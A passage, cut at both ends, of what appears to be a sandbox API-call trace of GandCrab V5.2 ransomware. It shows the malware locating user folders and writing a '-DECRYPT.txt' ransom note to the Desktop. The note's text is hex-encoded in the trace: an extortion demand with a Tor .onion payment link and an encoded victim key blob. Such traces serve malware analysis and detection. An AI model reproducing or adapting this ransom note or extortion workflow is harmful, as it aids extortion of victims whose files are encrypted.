returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop" [0087.236] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" [0087.236] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0087.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0087.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0087.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0087.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0087.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0087.237] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.237] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.238] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\\TITWMVJL-DECRYPT.txt") returned 51 [0087.238] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0087.238] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67